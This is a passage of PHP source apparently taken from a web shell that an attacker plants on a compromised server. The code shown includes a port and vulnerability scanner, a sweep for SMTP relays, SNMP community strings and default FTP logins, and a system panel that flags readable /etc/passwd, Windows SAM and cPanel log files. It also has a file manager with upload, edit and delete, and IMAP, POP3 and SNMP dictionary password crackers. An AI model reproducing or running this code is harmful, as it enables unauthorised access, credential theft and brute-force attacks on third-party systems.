$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
flusheR();
}
elseif(strstr($page,'@NUKE'))
foreach ($nuke as $cg){
$nukech=str_replace('@NUKE',$cg,$page);
$url="http://$ip$nukech";
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
flusheR();
}
else{
$url="http://$ip$page";
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
flusheR();
}
}
}
}
if(!empty($_REQUEST['smtprelay'])){
if(checkthisporT($ip,25,$timeout)){
$res='';
$res=checksmtP($ip,$timeout);
if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR();
}
}
if(!empty($_REQUEST['snmpscanner'])){
if(checkthisporT($ip,161,$timeout,1)){
$com=$_REQUEST['com'];
$coms=$res="";
if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com;
foreach ($c as $v){
$ret=snmpchecK($ip,$v,$timeout);
if($ret)$coms .=" $v ";
}
if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
flusheR();
}
}
if(!empty($_REQUEST['ftpscanner'])){
if(checkthisporT($ip,21,$timeout)){
$usps=explode(',',$_REQUEST['userpass']);
foreach ($usps as $v){
$user=substr($v,0,strpos($v,':'));
$pass=substr($v,strpos($v,':')+1);
if($pass=='[BLANK]')$pass='';
$ftp=@ftp_connect($ip,21,$timeout);
if ($ftp){
if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";}
}
flusheR();
}
}
}
if($output)echo "<hr size=1 noshade>";
flusheR();
}
$time=time()-$start;
echo "Done! ($time seconds)</font>";
if(!empty($buglist))unlink($buglist);
}
else{
$chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
$host = substr($host,0,strrpos($host,"."));
echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";
}
}
function sysinfO(){
global $windows,$disablefunctions,$safemode;
$cwd= getcwd();
$mil="<a target=\"_blank\" href=\"http://www.milw0rm.org/related.php?program=";
$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"];
$osver=$tsize=$fsize='';
if ($windows){ 
$osver = "  (".shelL("ver").")";
$sysroot = shelL("echo %systemroot%");
if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"];
if (empty($sysroot)) $sysroot = getenv("windir");
if (empty($sysroot)) $sysroot = "Not Found";
if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%");
for ($i=66;$i<=90;$i++){
$drive= chr($i).':\\';
if (is_dir($drive)){
$fsize+=@disk_free_space($drive);
$tsize+=@disk_total_space($drive);
}
}
}else{
$fsize=disk_free_space('/');
$tsize=disk_total_space('/');
}
$disksize="Used spase: ". showsizE($tsize-$fsize) . "   Free space: ". showsizE($fsize) . "   Total space: ". showsizE($tsize);
if (empty($CPU)) $CPU = "Unknow";
$os = php_unamE();
$osn=php_unamE('s');
if(!$windows){ 
$ker = php_unamE('r');
$o=($osn=="Linux")?"Linux+Kernel":$osn;
$os = str_replace($osn,"${mil}$o\">$osn</a>",$os);
$os = str_replace($ker,"${mil}Linux+Kernel\">$ker</a>",$os);
$inpa=':';
}else{
$sam = $sysroot."\\system32\\config\\SAM";
$inpa=';';
$os = str_replace($osn,"${mil}MS+Windows\">$osn</a>",$os);
}
$software=str_replace("Apache","${mil}Apache\">Apache</a>",$_SERVER['SERVER_SOFTWARE']);
echo "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td>Server information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Server:</td><td bgcolor=\"#666666\">".$_SERVER["HTTP_HOST"]; if (!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Operation system:</td><td bgcolor=\"#808080\">$os$osver</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Web server application:</td><td bgcolor=\"#666666\">$software</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">CPU:</td><td bgcolor=\"#808080\">$CPU</td></tr><td width=\"25%\" bgcolor=\"#666666\">Disk status:</td><td bgcolor=\"#666666\">$disksize</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">User domain:</td><td bgcolor=\"#808080\">";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">User name:</td><td bgcolor=\"#666666\">";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();else echo "Unknow"; echo "</td></tr>";
if ($windows){
echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Windows directory:</td><td bgcolor=\"#808080\"><a href=\"".hlinK("seC=fm&workingdiR=$sysroot")."\">$sysroot</a></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Sam file:</td><td bgcolor=\"#666666\">";if (is_readable(($sam)))echo "<a href=\"".hlinK("?workingdiR=$sysroot\\system32\\config&downloaD=sam")."\">Readable</a>"; else echo "Not readable";echo "</td></tr>";
}
else
{
echo "<tr><td width=\"25%\" bgcolor=\"#808080\">Passwd file:</td><td bgcolor=\"#808080\">";
if (is_readable('/etc/passwd')) echo "<a href=\"".hlinK("seC=edit&filE=/etc/passwd&workingdiR=$cwd")."\">Readable</a>"; else echo'Not readable';echo "</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Cpanel log file:</td><td bgcolor=\"#666666\">";
if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "<a href=\"".hlinK("seC=edit&filE=/var/cpanel/accounting.log&workingdiR=$cwd")."\">Readable</a>"; else echo "Not readable";}else echo "Not found";
echo "</td></tr>";
}
$uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR');
echo "<tr><td width=\"25%\" bgcolor=\"#808080\">${mil}PHP\">PHP</a> version:</td><td bgcolor=\"#808080\"><a href=\"?=".php_logo_guid()."\" target=\"_blank\">".PHP_VERSION."</a> (<a href=\"".hlinK("seC=phpinfo&workingdiR=$cwd")."\">more...</a>)</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Zend version:</td><td bgcolor=\"#666666\">";if (function_exists('zend_version')) echo "<a href=\"?=".zend_logo_guid()."\" target=\"_blank\">".zend_version()."</a>";else echo "Not Found";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Include path:</td><td bgcolor=\"#808080\">".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."</td><tr><td width=\"25%\" bgcolor=\"#666666\">PHP Modules:</td><td bgcolor=\"#666666\">";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";echo "</td><tr><td width=\"25%\" bgcolor=\"#808080\">Disabled functions:</td><td bgcolor=\"#808080\">";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Safe mode:</td><td bgcolor=\"#666666\">$safemode</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Open base dir:</td><td bgcolor=\"#808080\">$basedir</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">DBMS:</td><td bgcolor=\"#666666\">";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL</a> ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL</a> ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle</a> ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL</a> ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq</td></tr>";if (function_exists('curl_init')) echo "<tr><td width=\"25%\" bgcolor=\"#808080\">cURL support:</td><td bgcolor=\"#808080\">Enabled ";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "</td></tr>";echo "<tr><td>User information:</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">IP:</td><td bgcolor=\"#666666\">$uip</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Agent:</td><td bgcolor=\"#808080\">".getenv('HTTP_USER_AGENT')."</td></tr></table>";
}
function checksuM($file){
global $et;
echo "<table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"100%\"><tr><td width=\"10%\" bgcolor=\"#666666\"><b>MD5:</b> <font color=#F0F0F0>".md5_file($file)."</font><br><b>SHA1:</b> <font color=#F0F0F0>".sha1_file($file)."</font>$et";
}
function listdiR($cwd,$task){
$c= getcwd();
$dh = opendir($cwd);
while ($cont=readdir($dh)){
if($cont=='.' || $cont=='..')continue;
$adr = $cwd.DIRECTORY_SEPARATOR.$cont;
switch ($task){
case '0':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
case '1':if(is_writeable($adr))if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
case '2':if(is_file($adr) &&  is_writeable($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break;
case '3':if(is_dir($adr) && is_writeable($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
case '4':if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";break;
case '5':if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";break;
case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break;
case '7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[<a href=\"".hlinK("seC=edit&filE=$adr&workingdiR=$c")."\">$adr</a>]\n";if(is_dir($adr))echo "[<a href=\"".hlinK("seC=fm&workingdiR=$adr")."\">$adr</a>]\n";}break;
}
if (is_dir($adr)) listdiR($adr,$_REQUEST['task']);
}
}
if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}}
if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}}
function filemanager(){
global $windows,$msgbox,$errorbox,$t,$et,$hcwd;
$cwd= getcwd();
$table = "<table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\">";
$td1n="<td width=\"22%\" bgcolor=\"#666666\">";
$td2m="<td width=\"22%\" bgcolor=\"#808080\">";
$td1i="<td width=\"5%\" bgcolor=\"#666666\">";
$td2i="<td width=\"5%\" bgcolor=\"#808080\">";
$tdnr="<td width=\"22%\" bgcolor=\"#800000\">";
$tdw="<td width=\"22%\" bgcolor=\"#006E00\">";
if (!empty($_REQUEST['task'])){
if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7;
if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6;
echo "<font color=blue><pre>";
listdiR($cwd,$_REQUEST['task']);
echo "</pre></font>";
}else{
if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){
if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){
$title="Destination";
$ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];
$dis =(!empty($_REQUEST['cP']))?'Copy':'Move';
}else{
$ad = $_REQUEST['rN'];
$title ="New name";
$dis = "Rename";
}
if (!!empty($_REQUEST['deS'])){
echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tr><td width=\"100%\" bgcolor=\"#333333\">$title:</td></tr><tr>$td1n<form method=\"POST\"><input type=text value=\"";if(empty($_REQUEST['rN'])) echo $cwd; echo "\" size=60 name=deS></td></tr><tr>$td2m$hcwd<input type=hidden value=\"".htmlspecialchars($ad)."\" name=cp><input class=buttons type=submit value=$dis></td></tr></form></table></center>";
}else{
if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']);
else{
copy($ad,$_REQUEST['deS']);
if (!empty($_REQUEST['mV']))unlink($ad);
}
}
}
if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) {
$dh = opendir($_REQUEST['deL']);
$d="";
while ($cont=readdir($dh)){$d++;}
if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty!<td><tr></table><br>";else rmdir($_REQUEST['del']);}}
if (!empty($_FILES['uploadfile'])){
move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);
echo "$msgbox<b>Uploaded!</b> File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et<br>";
}
$select = "<select onChange=\"window.location=this.options[this.selectedIndex].value;\"><option value=\"".hlinK("seC=fm&workingdiR=$cwd")."\">--------</option><option value=\"";
if (!empty($_REQUEST['newf'])){
if (!empty($_REQUEST['newfile'])){file_put_contents($_REQUEST['newf'],"");}
if (!empty($_REQUEST['newdir'])){mkdir($_REQUEST['newf']);}
}
if ($windows){
echo "$table<td><b>Drives:</b> ";
for ($i=66;$i<=90;$i++){$drive= chr($i).':';
if (is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " <a title=\"$vol\" href=".hlinK("seC=fm&workingdiR=$drive\\").">$drive\\</a>";}
}
echo $et;
}
echo "$table<form method=\"POST\"><tr><td width=\"20%\"><b>Location:</b><input type=text name=workingdiR size=135 value=\"".getcwd()."\"><input class=buttons type=submit value=Change></td></tr></form></table>";
$file=array();$dir=array();$link=array();
if($dirhandle = opendir($cwd)){
while ($cont=readdir($dirhandle)){
if (is_dir($cwd.DIRECTORY_SEPARATOR.$cont)) $dir[]= $cont;
elseif (is_file($cwd.DIRECTORY_SEPARATOR.$cont)) $file[]=$cont;
else $link[]=$cont;
}
closedir($dirhandle);
sort($file);sort($dir);sort($link);
echo "<table border=1 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"100%\"><tr><td width=\"30%\" bgcolor=\"#333333\" align=\"center\">Name</td><td width=\"13%\" bgcolor=\"#333333\" align=\"center\">Owner</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Modification time</td><td width=\"12%\" bgcolor=\"#333333\" align=\"center\">Last change</td><td width=\"5%\" bgcolor=\"#333333\" align=\"center\">Info</td><td width=\"7%\" bgcolor=\"#333333\" align=\"center\">Size</td><td width=\"15%\" bgcolor=\"#333333\" align=\"center\">Actions</td></tr>";
$i=0;
foreach($dir as $dn){
echo "<tr>";
$i++;
$own="Unknow";
$owner=posix_getpwuid(fileowner($dn));
$mdate=date("Y/m/d H:i:s",filemtime($dn));
$adate=date("Y/m/d H:i:s",fileatime($dn));
$diraction = $select.hlinK("seC=fm&workingdiR=".realpath($dn))."\">Open</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$dn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$dn&workingdiR=$cwd")."\">Remove</option></select></td>";
if ($owner) $own = "<a title=\" Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
if (is_writeable($dn)) echo $tdw;elseif (!is_readable($dn)) echo $tdnr;else echo $cl2;
echo "<a href=\"".hlinK("seC=fm&workingdiR=".realpath($dn))."\">";
if (strlen($dn)>45)echo substr($dn,0,42)."...";else echo $dn;echo "</a>";
echo $cl1."$own</td>";
echo $cl1."$mdate</td>";
echo $cl1."$adate</td>";
echo "</td>${cl1}D";if (is_readable($dn)) echo "R";if (is_writeable($dn)) echo "W";echo "</td>";
echo "$cl1------</td>";
echo $cl2.$diraction;
echo "</tr>" ;
flusheR();
}
foreach($file as $fn){
echo "<tr>";
$i++;
$own = "Unknow";
$owner = posix_getpwuid(fileowner($fn));
$fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$fn&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$fn&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$fn&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$fn&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$fn&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$fn&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$fn")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$fn")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$fn")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$fn&workingdiR=$cwd")."\">Remove</option></select></td>";
$mdate = date("Y/m/d H:i:s",filemtime($fn));
$adate = date("Y/m/d H:i:s",fileatime($fn));
if ($owner) $own = "<a title=\"Shell:".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
$size = showsizE(filesize($fn));
if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
if (is_writeable($fn)) echo $tdw;elseif (!is_readable($fn)) echo $tdnr;else echo $cl2;
echo "<a href=\"".hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">";
if (strlen($fn)>45)echo substr($fn,0,42)."...";else echo $fn;echo "</a>";
echo $cl1."$own</td>";
echo $cl1."$mdate</td>";
echo $cl1."$adate</td>";
echo "</td>$cl1";if (is_readable($fn)) echo "R";if (is_writeable($fn)) echo "W";if (is_executable($fn)) echo "X";if (is_uploaded_file($fn)) echo "U"; echo "</td>";
echo "$cl1$size</td>";
echo $td2m.$fileaction;
echo "</tr>" ;
flusheR();
}
foreach($link as $ln){
$own = "Unknow";
$i++;
$owner = posix_getpwuid(fileowner($ln));
$linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."\">Open</option><option value=\"".hlinK("seC=edit&filE=$ln&workingdiR=$cwd")."\">Edit</option><option value=\"".hlinK("seC=fm&downloaD=$ln&workingdiR=$cwd")."\">Download</option><option value=\"".hlinK("seC=hex&filE=$ln&workingdiR=$cwd")."\">Hex view</option><option value=\"".hlinK("seC=img&filE=$ln&workingdiR=$cwd")."\">image</option><option value=\"".hlinK("seC=inc&filE=$ln&workingdiR=$cwd")."\">Include</option><option value=\"".hlinK("seC=checksum&filE=$ln&workingdiR=$cwd")."\">Checksum</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&cP=$ln")."\">Copy</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&mV=$ln")."\">Move</option><option value=\"".hlinK("seC=fm&workingdiR=$cwd&rN=$ln")."\">Rename</option><option value=\"".hlinK("seC=fm&deL=$ln&workingdiR=$cwd")."\">Remove</option></select></td>";
$mdate = date("Y/m/d H:i:s",filemtime($ln));
$adate = date("Y/m/d H:i:s",fileatime($ln));
if ($owner) $own = "<a title=\"Shell: ".$owner['shell']."\" href=\"".hlinK("seC=fm&workingdiR=".$owner['dir'])."\">".$owner['name']."</a>";
echo "<tr>";
$size = showsizE(filesize($ln));
if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;}
if (is_writeable($ln)) echo $tdw;elseif (!is_readable($ln)) echo $tdnr;else echo $cl2;
echo "<a href=\"".hlinK("seC=openit&namE=$ln&workingdiR=$cwd")."\">";
if (strlen($ln)>45)echo substr($ln,0,42)."...";else echo $ln;echo "</a>";
echo $cl1."$own</td>";
echo $cl1."$mdate</td>";
echo $cl1."$adate</td>";
echo "</td>${cl1}L";if (is_readable($ln)) echo "R";if (is_writeable($ln)) echo "W";if (is_executable($ln)) echo "X"; echo "</td>";
echo "$cl1$size</td>";
echo $cl2.$linkaction;
echo "</tr>" ;
flusheR();
}
}
$dc = count($dir)-2;
if($dc==-2)$dc=0;
$fc = count($file);
$lc = count($link);
$total = $dc + $fc + $lc;
echo "$table<tr><td><form method=POST>Find:<input type=text name=search><input type=checkbox name=re value=1 style=\"border-width:1px;background-color:#333333;\" checked>Regular expressions <input type=submit class=buttons value=Find>$hcwd<input type=hidden value=7 name=task></form></td><td><form method=POST>$hcwd<input type=hidden value=\"fm\" name=seC><select name=task><option value=0>Display files and directories in current folder</option><option value=1>Find writable files and directories in current folder</option><option value=2>Find writable files in current folder</option><option value=3>Find writable directories in current folder</option><option value=4>Display all files in current folder</option><option value=5>Display all directories in current folder</option></select><input type=submit class=buttons value=Do></form>$et</tr></table><table width=\"100%\"><tr><td width=\"50%\"><br><table bgcolor=#333333 border=0 width=\"65%\"><td><b>Summery:</b>   Total: $total Directories: $dc Files: $fc Links: $lc</td></table><table bgcolor=#333333 border=0 width=\"65%\"><td width=\"100%\" bgcolor=";if (is_writeable($cwd)) echo "#006E00";elseif (!is_readable($cwd)) echo "#800000";else "#333333"; echo ">Current directory status: "; if (is_readable($cwd)) echo "R";if (is_writeable($cwd)) echo "W" ;echo "</td></table><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"65%\"><tr><td width=\"100%\" bgcolor=\"#333333\">New:</td></tr><tr>$td1n<form method=\"POST\"><input type=text size=47 name=newf></td></tr><tr>$td2m$hcwd<input class=buttons type=submit name=newfile value=\"File\"><input class=buttons type=submit name=newdir value=\"Folder\"></td></tr></form></table></td><td width=\"50%\"><br>${t}Upload:</td></tr><tr>$td1n<form method=\"POST\" enctype=\"multipart/form-data\"><input type=file size=45 name=uploadfile></td></tr><tr>$td2m$hcwd<input class=buttons type=submit value=Upload></td></tr>$td1n Note: Max allowed file size to upload on this server is ".ini_get('upload_max_filesize')."</td></tr></form></table>$et";
}
}
function imaplogiN($host,$username,$password){
$sock=fsockopen($host,143,$n,$s,5);
$b=namE();
$l=strlen($b);
if(!$sock)return -1;
fread($sock,1024);
fputs($sock,"$b LOGIN $username $password\r\n");
$res=fgets($sock,$l+4);
if ($res == "$b OK")return 1;else return 0;
fclose($sock);
}
function pop3logiN($server,$user,$pass){
$sock=fsockopen($server,110,$en,$es,5);
if(!$sock)return -1;
fread($sock,1024);
fwrite($sock,"user $user\n");
$r=fgets($sock);
if($r{0}=='-')return 0;
fwrite($sock,"pass $pass\n");
$r=fgets($sock);
fclose($sock);
if($r{0}=='+')return 1;
return 0;
}
function imapcrackeR(){
global $t,$et,$errorbox,$crack;
if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
$target=$_REQUEST['target'];
$type=$_REQUEST['combo'];
$user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
$dictionary=fopen($_REQUEST['dictionary'],'r');
if ($dictionary){
echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
while(!feof($dictionary)){
if($type){
$combo=trim(fgets($dictionary)," \n\r");
$user=substr($combo,0,strpos($combo,':'));
$pass=substr($combo,strpos($combo,':')+1);
}else{
$pass=trim(fgets($dictionary)," \n\r");
}
$imap=imaplogiN($target,$user,$pass);
if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{
if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}}
flusheR();
}
echo "<br>Done</font>";
fclose($dictionary);
}
else{
echo "$errorbox Can not open dictionary.$et";
}
}else echo "<center>${t}IMAP cracker:$crack";
}
function snmpcrackeR(){
global $t,$et,$errorbox,$crack,$hcwd;
if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
$target=$_REQUEST['target'];
$dictionary=fopen($_REQUEST['dictionary'],'r');
if ($dictionary){
echo "<font color=blue>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
while(!feof($dictionary)){
$com=trim(fgets($dictionary)," \n\r");
$res=snmpchecK($target,$com,2);
if($res)echo "$com<br>";
flusheR();
}
echo "<br>Done</font>";
fclose($dictionary);
}
else{
echo "$errorbox Can not open dictionary.$et";
}
